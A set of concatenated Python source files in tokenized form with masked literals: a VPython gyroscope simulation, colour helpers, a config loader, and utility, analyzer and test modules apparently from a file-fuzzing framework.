I1 = M * r ** <NUM_LIT:2> + <NUM_LIT> * I3
# Pedestal/base scenery dimensions.
hpedestal = Lshaft
wpedestal = <NUM_LIT:0.1>
tbase = <NUM_LIT>
wbase = <NUM_LIT:3> * wpedestal
g = <NUM_LIT>                   # gravitational acceleration
Fgrav = vector(<NUM_LIT:0>, -M * g, <NUM_LIT:0>)
top = vector(<NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:0>)  # pivot point of the shaft

# Initial Euler angles and angular rates (theta: tilt, phi: precession,
# psi: spin about the shaft).
theta = <NUM_LIT> * pi
thetadot = <NUM_LIT:0>
psi = <NUM_LIT:0>
psidot = <NUM_LIT:30>
phi = -pi / <NUM_LIT:2>
phidot = <NUM_LIT:0>
if False:
    # Disabled alternative: start on the steady-precession solution by
    # solving the quadratic for phidot.
    a = (<NUM_LIT:1> - I3 / I1) * sin(theta) * cos(theta)
    b = -(I3 / I1) * psidot * sin(theta)
    c = M * g * r * sin(theta) / I1
    phidot = (-b + sqrt(b ** <NUM_LIT:2> - <NUM_LIT:4> * a * c)) / (<NUM_LIT:2> * a)

# Static scenery: pedestal and base below the pivot.
pedestal = box(pos=top - vector(<NUM_LIT:0>, hpedestal / <NUM_LIT>, <NUM_LIT:0>),
               height=hpedestal, length=wpedestal, width=wpedestal,
               color=(<NUM_LIT>, <NUM_LIT>, <NUM_LIT:0.5>))
base = box(pos=top - vector(<NUM_LIT:0>, hpedestal + tbase / <NUM_LIT>, <NUM_LIT:0>),
           height=tbase, length=wbase, width=wbase,
           color=pedestal.color)
# The gyroscope itself lives in a frame whose axis follows the shaft.
gyro = frame(axis=(sin(theta) * sin(phi), cos(theta), sin(theta) * cos(phi)))
shaft = cylinder(axis=(Lshaft, <NUM_LIT:0>, <NUM_LIT:0>), radius=Rshaft, color=color.green,
                 material=materials.rough, frame=gyro)
rotor = cylinder(pos=(Lshaft / <NUM_LIT:2> - Drotor / <NUM_LIT:2>, <NUM_LIT:0>, <NUM_LIT:0>),
                 axis=(Drotor, <NUM_LIT:0>, <NUM_LIT:0>), radius=Rrotor,
                 color=color.gray(<NUM_LIT>),
                 material=materials.rough, frame=gyro)
# A trailing marker at the shaft tip visualizes the precession path.
tip = sphere(pos=gyro.pos + gyro.axis * Lshaft, color=color.yellow,
             radius=<NUM_LIT> * shaft.radius, make_trail=True,
             interval=<NUM_LIT:5>, retain=<NUM_LIT>)
tip.trail_object.radius = <NUM_LIT> * shaft.radius
scene.autoscale = <NUM_LIT:0>

dt = <NUM_LIT>      # integration time step
t = <NUM_LIT:0.>
Nsteps = <NUM_LIT:20>  # physics substeps per rendered frame
while True:
    rate(<NUM_LIT:100>)
    for step in range(Nsteps):
        # Euler-angle equations of motion for a symmetric top with a
        # fixed pivot (explicit Euler integration).
        # NOTE(review): aphi divides by sin(theta) — assumes theta never
        # passes through 0; confirm initial conditions keep it away.
        atheta = sin(theta) * cos(theta) * phidot ** <NUM_LIT:2> + (
            M * g * r * sin(theta) - I3 * (psidot + phidot * cos(theta)) * phidot * sin(theta)) / I1
        aphi = (I3 / I1) * (psidot + phidot * cos(theta)) * thetadot / sin(theta) - <NUM_LIT:2> * cos(theta) * thetadot * phidot / sin(theta)
        apsi = phidot * thetadot * sin(theta) - aphi * cos(theta)
        thetadot += atheta * dt
        phidot += aphi * dt
        psidot += apsi * dt
        theta += thetadot * dt
        phi += phidot * dt
        psi += psidot * dt
    # Update the rendered orientation once per frame.
    gyro.axis = vector(sin(theta) * sin(phi), cos(theta), sin(theta) * cos(phi))
    gyro.rotate(angle=psidot * dt * Nsteps)
    tip.pos = gyro.pos + gyro.axis * Lshaft
    t = t + dt * Nsteps
<s> import colorsys <EOL> black = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> white = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> red = ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> green = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> blue = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> yellow = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> cyan = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> magenta = ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> orange = ( <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> def gray ( luminance ) : <EOL> return ( luminance , luminance , luminance ) <EOL> def rgb_to_hsv ( T ) : <EOL> if len ( T ) > <NUM_LIT:3> : <EOL> T = T [ : <NUM_LIT:3> ] <EOL> return colorsys . rgb_to_hsv ( * T ) <EOL> def hsv_to_rgb ( T ) : <EOL> if len ( T ) > <NUM_LIT:3> : <EOL> T = T [ : <NUM_LIT:3> ] <EOL> return colorsys . hsv_to_rgb ( * T ) <EOL> def rgb_to_grayscale ( T ) : <EOL> if len ( T ) > <NUM_LIT:3> : <EOL> T = T [ : <NUM_LIT:3> ] <EOL> luminance = <NUM_LIT> * T [ <NUM_LIT:0> ] + <NUM_LIT> * T [ <NUM_LIT:1> ] + <NUM_LIT> * T [ <NUM_LIT:2> ] <EOL> return ( luminance , luminance , luminance ) </s>
import os
import os.path
import sys

# Resolve the user configuration file: prefer the XDG config directory
# environment variable, otherwise fall back to a directory under HOME.
# NOTE(review): if the HOME-like variable is unset, os.getenv returns None
# and os.path.join would raise — presumably it is always set here; confirm.
xdg = os.getenv('<STR_LIT>') or os.path.join(os.getenv('<STR_LIT>'), '<STR_LIT>')
conffile = os.path.join(xdg, '<STR_LIT>', '<STR_LIT>')
if not os.access(conffile, os.R_OK):
    # User copy missing or unreadable: try the system-wide location.
    conffile = os.path.join('<STR_LIT:/>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')
    if not os.access(conffile, os.R_OK):
        # Neither location is readable: report and abort (Python 2 syntax).
        print >> sys.stderr, '<STR_LIT>' '<STR_LIT>' % conffile
        sys.exit(<NUM_LIT:1>)
# Execute the configuration script in the current namespace (Python 2).
execfile(conffile)
<s> from bottle_rest import * </s>
<s> """<STR_LIT>""" <EOL> from app import db <EOL> db . create_all ( ) </s>
'''<STR_LIT>'''
import logging

from .. import Analyzer

logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)

OUTFILE_EXT = "<STR_LIT>"


def get_file(x):
    """Derive the callgrind output file name from a fuzzed-file path."""
    return '<STR_LIT>' % (x, OUTFILE_EXT)


class Callgrind(Analyzer):
    """Analyzer that runs the crashing target under valgrind's callgrind."""

    def __init__(self, cfg, crash):
        # Output path derives from the fuzzed file; timeout from the config.
        outfile = get_file(crash.fuzzedfile.path)
        timeout = cfg.valgrindtimeout
        super(Callgrind, self).__init__(cfg, crash, outfile, timeout)
        # A run that produces no (or an empty) output file is acceptable.
        self.empty_output_ok = True
        self.missing_output_ok = True

    def _get_cmdline(self):
        """Return the argv list used to launch the tool plus the target."""
        cmdline = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>' % self.outfile]
        cmdline += self.cmdargs
        return cmdline
<s> '''<STR_LIT>''' <EOL> import logging <EOL> import argparse <EOL> from . . api . aapt import Aapt <EOL> from . . api . android_manifest import AndroidManifest <EOL> import os <EOL> def main ( ) : <EOL> logger = logging . getLogger ( ) <EOL> hdlr = logging . StreamHandler ( ) <EOL> logger . addHandler ( hdlr ) <EOL> parser = argparse . ArgumentParser ( ) <EOL> group = parser . add_mutually_exclusive_group ( ) <EOL> group . add_argument ( '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> group . add_argument ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' , <EOL> type = str ) <EOL> args = parser . parse_args ( ) <EOL> if args . debug : <EOL> logger . setLevel ( logging . DEBUG ) <EOL> elif args . verbose : <EOL> logger . setLevel ( logging . INFO ) <EOL> else : <EOL> logger . setLevel ( logging . WARNING ) <EOL> aapt = Aapt ( ) <EOL> aapt . get_manifest ( os . path . expanduser ( args . apk ) ) <EOL> manifest_text = aapt . stdout <EOL> manifest = AndroidManifest ( manifest_text ) <EOL> vstr = '<STR_LIT>' . format ( os . path . basename ( args . apk ) , manifest . version_info ) <EOL> print '<STR_LIT:#>' * ( len ( vstr ) + <NUM_LIT:4> ) <EOL> print '<STR_LIT>' . format ( vstr ) <EOL> print '<STR_LIT:#>' * ( len ( vstr ) + <NUM_LIT:4> ) <EOL> print <EOL> for mimetype in manifest . mimetypes : <EOL> print mimetype <EOL> print <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from errors import DbError </s>
<s> from . basicfile import BasicFile <EOL> from . fuzzedfile import FuzzedFile <EOL> from . seedfile import SeedFile <EOL> from . errors import FileHandlerError , BasicFileError , FuzzedFileError <EOL> from . errors import SeedFileError </s>
<s> '''<STR_LIT>''' <EOL> import itertools <EOL> import os <EOL> def vector_compare ( v1 , v2 ) : <EOL> '''<STR_LIT>''' <EOL> vdict = { } <EOL> for v in v1 , v2 : <EOL> for idx in v : <EOL> if vdict . get ( idx ) : <EOL> vdict [ idx ] += <NUM_LIT:1> <EOL> else : <EOL> vdict [ idx ] = <NUM_LIT:1> <EOL> distance = <NUM_LIT:0> <EOL> for val in vdict . values ( ) : <EOL> if val == <NUM_LIT:1> : <EOL> distance += <NUM_LIT:1> <EOL> return distance <EOL> def bytemap ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( s1 ) == len ( s2 ) <EOL> delta = [ ] <EOL> for idx , ( c1 , c2 ) in enumerate ( itertools . izip ( s1 , s2 ) ) : <EOL> if c1 != c2 : <EOL> delta . append ( idx ) <EOL> return delta <EOL> def bytewise_hd ( s1 , s2 ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( s1 ) == len ( s2 ) <EOL> return sum ( ch1 != ch2 for ch1 , ch2 in itertools . izip ( s1 , s2 ) ) <EOL> def bytewise_hamming_distance ( file1 , file2 ) : <EOL> '''<STR_LIT>''' <EOL> return _file_compare ( bytewise_hd , file1 , file2 ) <EOL> def _file_compare ( distance_function , file1 , file2 ) : <EOL> assert os . path . getsize ( file1 ) == os . path . getsize ( file2 ) <EOL> distance = <NUM_LIT:0> <EOL> with open ( file1 , '<STR_LIT:rb>' ) as f1 : <EOL> with open ( file2 , '<STR_LIT:rb>' ) as f2 : <EOL> distance = distance_function ( f1 . read ( ) , f2 . read ( ) ) <EOL> return distance <EOL> def bitwise_hd ( x , y ) : <EOL> '''<STR_LIT>''' <EOL> assert len ( x ) == len ( y ) <EOL> hd = <NUM_LIT:0> <EOL> for ( a , b ) in itertools . izip ( x , y ) : <EOL> a = ord ( a ) <EOL> b = ord ( b ) <EOL> v = a ^ b <EOL> while v : <EOL> v = v & ( v - <NUM_LIT:1> ) <EOL> hd += <NUM_LIT:1> <EOL> return hd <EOL> def bitwise_hamming_distance ( file1 , file2 ) : <EOL> '''<STR_LIT>''' <EOL> return _file_compare ( bitwise_hd , file1 , file2 ) </s>
<s> from ctypes import c_void_p , POINTER , sizeof , Structure , windll , WinError , WINFUNCTYPE <EOL> from ctypes . wintypes import BOOL , BYTE , DWORD , HANDLE , LPCWSTR , LPWSTR , UINT , WORD <EOL> LPVOID = c_void_p <EOL> LPBYTE = POINTER ( BYTE ) <EOL> LPDWORD = POINTER ( DWORD ) <EOL> def ErrCheckBool ( result , func , args ) : <EOL> """<STR_LIT>""" <EOL> if not result : <EOL> raise WinError ( ) <EOL> return args <EOL> CloseHandleProto = WINFUNCTYPE ( BOOL , HANDLE ) <EOL> CloseHandle = CloseHandleProto ( ( "<STR_LIT>" , windll . kernel32 ) ) <EOL> CloseHandle . errcheck = ErrCheckBool <EOL> class AutoHANDLE ( HANDLE ) : <EOL> """<STR_LIT>""" <EOL> def Close ( self ) : <EOL> if self . value : <EOL> CloseHandle ( self ) <EOL> self . value = <NUM_LIT:0> <EOL> def __del__ ( self ) : <EOL> self . Close ( ) <EOL> def __int__ ( self ) : <EOL> return self . value <EOL> def ErrCheckHandle ( result , func , args ) : <EOL> """<STR_LIT>""" <EOL> if not result : <EOL> raise WinError ( ) <EOL> return AutoHANDLE ( result ) <EOL> class PROCESS_INFORMATION ( Structure ) : <EOL> _fields_ = [ ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) ] <EOL> def __init__ ( self ) : <EOL> Structure . __init__ ( self ) <EOL> self . 
cb = sizeof ( self ) <EOL> LPPROCESS_INFORMATION = POINTER ( PROCESS_INFORMATION ) <EOL> class STARTUPINFO ( Structure ) : <EOL> _fields_ = [ ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , LPWSTR ) , <EOL> ( "<STR_LIT>" , LPWSTR ) , <EOL> ( "<STR_LIT>" , LPWSTR ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , DWORD ) , <EOL> ( "<STR_LIT>" , WORD ) , <EOL> ( "<STR_LIT>" , WORD ) , <EOL> ( "<STR_LIT>" , LPBYTE ) , <EOL> ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , HANDLE ) , <EOL> ( "<STR_LIT>" , HANDLE ) <EOL> ] <EOL> LPSTARTUPINFO = POINTER ( STARTUPINFO ) <EOL> STARTF_USESHOWWINDOW = <NUM_LIT> <EOL> STARTF_USESIZE = <NUM_LIT> <EOL> STARTF_USEPOSITION = <NUM_LIT> <EOL> STARTF_USECOUNTCHARS = <NUM_LIT> <EOL> STARTF_USEFILLATTRIBUTE = <NUM_LIT> <EOL> STARTF_RUNFULLSCREEN = <NUM_LIT> <EOL> STARTF_FORCEONFEEDBACK = <NUM_LIT> <EOL> STARTF_FORCEOFFFEEDBACK = <NUM_LIT> <EOL> STARTF_USESTDHANDLES = <NUM_LIT> <EOL> class EnvironmentBlock : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dict ) : <EOL> if not dict : <EOL> self . _as_parameter_ = None <EOL> else : <EOL> values = [ "<STR_LIT>" % ( key , value ) <EOL> for ( key , value ) in dict . iteritems ( ) ] <EOL> values . append ( "<STR_LIT>" ) <EOL> self . _as_parameter_ = LPCWSTR ( "<STR_LIT>" . 
join ( values ) ) <EOL> CreateProcessProto = WINFUNCTYPE ( BOOL , <EOL> LPCWSTR , <EOL> LPWSTR , <EOL> LPVOID , <EOL> LPVOID , <EOL> BOOL , <EOL> DWORD , <EOL> LPVOID , <EOL> LPCWSTR , <EOL> LPSTARTUPINFO , <EOL> LPPROCESS_INFORMATION <EOL> ) <EOL> CreateProcessFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , True ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT:0> ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:2> , "<STR_LIT>" ) ) <EOL> def ErrCheckCreateProcess ( result , func , args ) : <EOL> ErrCheckBool ( result , func , args ) <EOL> pi = args [ <NUM_LIT:9> ] <EOL> return AutoHANDLE ( pi . hProcess ) , AutoHANDLE ( pi . hThread ) , pi . dwProcessID , pi . dwThreadID <EOL> CreateProcess = CreateProcessProto ( ( "<STR_LIT>" , windll . kernel32 ) , <EOL> CreateProcessFlags ) <EOL> CreateProcess . errcheck = ErrCheckCreateProcess <EOL> CREATE_BREAKAWAY_FROM_JOB = <NUM_LIT> <EOL> CREATE_DEFAULT_ERROR_MODE = <NUM_LIT> <EOL> CREATE_NEW_CONSOLE = <NUM_LIT> <EOL> CREATE_NEW_PROCESS_GROUP = <NUM_LIT> <EOL> CREATE_NO_WINDOW = <NUM_LIT> <EOL> CREATE_SUSPENDED = <NUM_LIT> <EOL> CREATE_UNICODE_ENVIRONMENT = <NUM_LIT> <EOL> DEBUG_ONLY_THIS_PROCESS = <NUM_LIT> <EOL> DEBUG_PROCESS = <NUM_LIT> <EOL> DETACHED_PROCESS = <NUM_LIT> <EOL> CreateJobObjectProto = WINFUNCTYPE ( HANDLE , <EOL> LPVOID , <EOL> LPCWSTR <EOL> ) <EOL> CreateJobObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" , None ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , LPCWSTR ( "<STR_LIT>" ) ) ) <EOL> CreateJobObject = CreateJobObjectProto ( ( "<STR_LIT>" , windll . kernel32 ) , <EOL> CreateJobObjectFlags ) <EOL> CreateJobObject . 
errcheck = ErrCheckHandle <EOL> AssignProcessToJobObjectProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> HANDLE <EOL> ) <EOL> AssignProcessToJobObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" ) ) <EOL> AssignProcessToJobObject = AssignProcessToJobObjectProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> AssignProcessToJobObjectFlags ) <EOL> AssignProcessToJobObject . errcheck = ErrCheckBool <EOL> def ErrCheckResumeThread ( result , func , args ) : <EOL> if result == - <NUM_LIT:1> : <EOL> raise WinError ( ) <EOL> return args <EOL> ResumeThreadProto = WINFUNCTYPE ( DWORD , <EOL> HANDLE <EOL> ) <EOL> ResumeThreadFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , ) <EOL> ResumeThread = ResumeThreadProto ( ( "<STR_LIT>" , windll . kernel32 ) , <EOL> ResumeThreadFlags ) <EOL> ResumeThread . errcheck = ErrCheckResumeThread <EOL> TerminateProcessProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> UINT <EOL> ) <EOL> TerminateProcessFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT> ) ) <EOL> TerminateProcess = TerminateProcessProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> TerminateProcessFlags ) <EOL> TerminateProcess . errcheck = ErrCheckBool <EOL> TerminateJobObjectProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> UINT <EOL> ) <EOL> TerminateJobObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT> ) ) <EOL> TerminateJobObject = TerminateJobObjectProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> TerminateJobObjectFlags ) <EOL> TerminateJobObject . errcheck = ErrCheckBool <EOL> WaitForSingleObjectProto = WINFUNCTYPE ( DWORD , <EOL> HANDLE , <EOL> DWORD , <EOL> ) <EOL> WaitForSingleObjectFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:1> , "<STR_LIT>" , - <NUM_LIT:1> ) ) <EOL> WaitForSingleObject = WaitForSingleObjectProto ( <EOL> ( "<STR_LIT>" , windll . 
kernel32 ) , <EOL> WaitForSingleObjectFlags ) <EOL> INFINITE = - <NUM_LIT:1> <EOL> WAIT_TIMEOUT = <NUM_LIT> <EOL> WAIT_OBJECT_0 = <NUM_LIT> <EOL> WAIT_ABANDONED = <NUM_LIT> <EOL> GetExitCodeProcessProto = WINFUNCTYPE ( BOOL , <EOL> HANDLE , <EOL> LPDWORD , <EOL> ) <EOL> GetExitCodeProcessFlags = ( ( <NUM_LIT:1> , "<STR_LIT>" ) , <EOL> ( <NUM_LIT:2> , "<STR_LIT>" ) ) <EOL> GetExitCodeProcess = GetExitCodeProcessProto ( <EOL> ( "<STR_LIT>" , windll . kernel32 ) , <EOL> GetExitCodeProcessFlags ) <EOL> GetExitCodeProcess . errcheck = ErrCheckBool </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def testName ( self ) : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from certfuzz . test import misc <EOL> import certfuzz . crash <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_api ( self ) : <EOL> module = certfuzz . crash <EOL> api_list = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ( is_fail , msg ) = misc . check_for_apis ( module , api_list ) <EOL> self . assertFalse ( is_fail , msg ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> import os <EOL> import shutil <EOL> from certfuzz . fuzzers . nullmut import NullMutFuzzer <EOL> from certfuzz . test import MockSeedfile , MockRange <EOL> import tempfile <EOL> from certfuzz . fuzztools . hamming import bytewise_hd <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . sf = seedfile_obj = MockSeedfile ( ) <EOL> self . sf . value = bytearray ( self . sf . value ) <EOL> self . nulls_inserted = <NUM_LIT:0> <EOL> for i in xrange ( <NUM_LIT:0> , len ( self . sf . value ) , <NUM_LIT:10> ) : <EOL> self . sf . value [ i ] = <NUM_LIT> <EOL> self . nulls_inserted += <NUM_LIT:1> <EOL> self . tempdir = tempfile . mkdtemp ( ) <EOL> self . outdir = outdir_base = tempfile . mkdtemp ( prefix = '<STR_LIT>' , <EOL> dir = self . tempdir ) <EOL> rng_seed = <NUM_LIT:0> <EOL> iteration = <NUM_LIT:0> <EOL> self . options = { '<STR_LIT>' : <NUM_LIT:0.1> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . args = ( seedfile_obj , outdir_base , rng_seed , iteration , self . options ) <EOL> def tearDown ( self ) : <EOL> shutil . rmtree ( self . tempdir ) <EOL> def test_is_minimizable ( self ) : <EOL> f = NullMutFuzzer ( * self . args ) <EOL> self . assertTrue ( f . is_minimizable ) <EOL> def test_fuzzable_chars ( self ) : <EOL> f = NullMutFuzzer ( * self . args ) <EOL> self . assertTrue ( <NUM_LIT> in f . fuzzable_chars ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import unittest <EOL> from certfuzz . scoring . multiarmed_bandit . arms import errors <EOL> class Test ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> pass <EOL> def tearDown ( self ) : <EOL> pass <EOL> def testName ( self ) : <EOL> pass <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> import os <EOL> import logging <EOL> import sys <EOL> import re <EOL> from optparse import OptionParser <EOL> parent_path = os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , parent_path ) <EOL> from certfuzz . campaign . config . bff_config import read_config_options <EOL> logger = logging . getLogger ( __name__ ) <EOL> logger . setLevel ( logging . INFO ) <EOL> hdlr = logging . StreamHandler ( sys . stdout ) <EOL> logger . addHandler ( hdlr ) <EOL> def _fmt_ln ( formats , parts ) : <EOL> return '<STR_LIT:\t>' . join ( fmt % val for ( fmt , val ) in zip ( formats , parts ) ) <EOL> def format_header ( parts ) : <EOL> formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return '<STR_LIT:#>' + _fmt_ln ( formats , parts ) <EOL> def format_line ( parts ) : <EOL> formats = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return _fmt_ln ( formats , parts ) <EOL> def record_stats ( key , seed_list , counters , first_seeds , last_seeds ) : <EOL> uniq_seeds = list ( set ( seed_list ) ) <EOL> logger . debug ( '<STR_LIT>' , uniq_seeds ) <EOL> first_seeds [ key ] = min ( uniq_seeds ) <EOL> last_seeds [ key ] = max ( uniq_seeds ) <EOL> counters [ key ] = len ( uniq_seeds ) <EOL> logger . debug ( '<STR_LIT>' , key , first_seeds [ key ] , last_seeds [ key ] , counters [ key ] ) <EOL> def get_sort_key ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) : <EOL> if options . sort_by_first : <EOL> sort_by = first_seeds <EOL> reverse = False <EOL> elif options . sort_by_last : <EOL> sort_by = last_seeds <EOL> reverse = False <EOL> elif options . sort_by_bits : <EOL> sort_by = bit_hds <EOL> reverse = False <EOL> elif options . 
sort_by_bytes : <EOL> sort_by = byte_hds <EOL> reverse = False <EOL> else : <EOL> sort_by = counters <EOL> reverse = True <EOL> return sort_by , reverse <EOL> def prepare_output ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) : <EOL> output_lines = [ ] <EOL> header_line = format_header ( ( '<STR_LIT>' , '<STR_LIT:count>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> output_lines . append ( header_line ) <EOL> sort_by , reverse = get_sort_key ( options , counters , bit_hds , byte_hds , first_seeds , last_seeds ) <EOL> for dummy , k in sorted ( [ ( value , key ) for ( key , value ) in sort_by . items ( ) ] , reverse = reverse ) : <EOL> parts = [ k , counters [ k ] , first_seeds [ k ] , last_seeds [ k ] , bit_hds [ k ] , byte_hds [ k ] ] <EOL> output_lines . append ( format_line ( parts ) ) <EOL> return output_lines <EOL> def parse_cmdline_args ( ) : <EOL> parser = OptionParser ( ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_option ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , help = "<STR_LIT>" , action = '<STR_LIT:store_true>' , default = False ) <EOL> options , dummy = parser . parse_args ( ) <EOL> return options <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> options = parse_cmdline_args ( ) <EOL> if options . debug : <EOL> logger . setLevel ( logging . 
DEBUG ) <EOL> if options . cfgfile : <EOL> cfg_file = options . cfgfile <EOL> else : <EOL> cfg_file = os . path . join ( parent_path , '<STR_LIT>' , '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' , cfg_file ) <EOL> cfg = read_config_options ( cfg_file ) <EOL> result_dir = cfg . crashers_dir <EOL> logger . debug ( '<STR_LIT>' , result_dir ) <EOL> counters = { } <EOL> bit_hds = { } <EOL> byte_hds = { } <EOL> first_seeds = { } <EOL> last_seeds = { } <EOL> if not os . path . isdir ( result_dir ) : <EOL> logger . info ( '<STR_LIT>' , result_dir ) <EOL> sys . exit ( ) <EOL> for x in os . listdir ( result_dir ) : <EOL> fullpath = os . path . join ( result_dir , x ) <EOL> if not os . path . isdir ( fullpath ) : <EOL> logger . debug ( '<STR_LIT>' , fullpath ) <EOL> continue <EOL> logger . debug ( '<STR_LIT>' , fullpath ) <EOL> crashlog = '<STR_LIT>' % x <EOL> fullpath_crashlog = os . path . join ( fullpath , crashlog ) <EOL> if not os . path . isfile ( fullpath_crashlog ) : <EOL> logger . debug ( '<STR_LIT>' , fullpath_crashlog ) <EOL> continue <EOL> logger . debug ( '<STR_LIT>' , fullpath_crashlog ) <EOL> seed_list = [ ] <EOL> f = open ( fullpath_crashlog , '<STR_LIT:r>' ) <EOL> try : <EOL> for l in f . readlines ( ) : <EOL> m = re . search ( '<STR_LIT>' , l ) <EOL> if m : <EOL> seed_list . append ( int ( m . group ( <NUM_LIT:1> ) ) ) <EOL> logger . debug ( '<STR_LIT>' , x , m . group ( <NUM_LIT:1> ) ) <EOL> continue <EOL> m = re . match ( '<STR_LIT>' , l ) <EOL> if m : <EOL> bit_hds [ x ] = int ( m . group ( <NUM_LIT:1> ) ) <EOL> logger . debug ( '<STR_LIT>' , x , m . group ( <NUM_LIT:1> ) ) <EOL> continue <EOL> m = re . match ( '<STR_LIT>' , l ) <EOL> if m : <EOL> byte_hds [ x ] = int ( m . 